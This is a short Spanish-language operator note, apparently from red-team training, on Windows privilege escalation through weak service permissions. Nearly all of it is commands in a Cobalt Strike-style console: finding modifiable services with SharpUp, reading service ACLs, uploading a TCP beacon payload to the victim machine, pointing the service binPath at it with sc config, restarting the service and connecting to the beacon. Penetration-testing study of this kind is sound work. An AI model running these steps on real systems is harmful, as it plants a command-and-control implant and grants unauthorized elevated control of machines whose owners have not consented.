Weak Service Permissions

Identificar servicios vulnerables.

execute-assembly C:\Tools\SharpUp.exe audit ModifiableServices

Muestra los permisos de los servicios que podemos modificar.

powershell-import c:\Tools\Get-ServiceACL.ps1
powershell Get-ServiceAcl -Name "Vulnerable Service 2" | select -expandproperty Access

Creamos un payload y lo subimos a la maquina victima.

mkdir c:\Temp
cd c:\Temp
upload C:\Tools\Payloads\tcp_beacon_x64.exe
mv tcp_beacon_x64.exe Service2.exe

Configuracion del servicio.

run sc config "Vulnerable Service 2" binPath= C:\Temp\Service2.exe

Verificar las caracteristicas del servicio.

run sc qc "Vulnerable Service 2"

Iniciar servicio.

run sc stop "Vulnerable Service 2"
run sc start "Vulnerable Service 2"

Acceder al beacon.

connect localhost 4444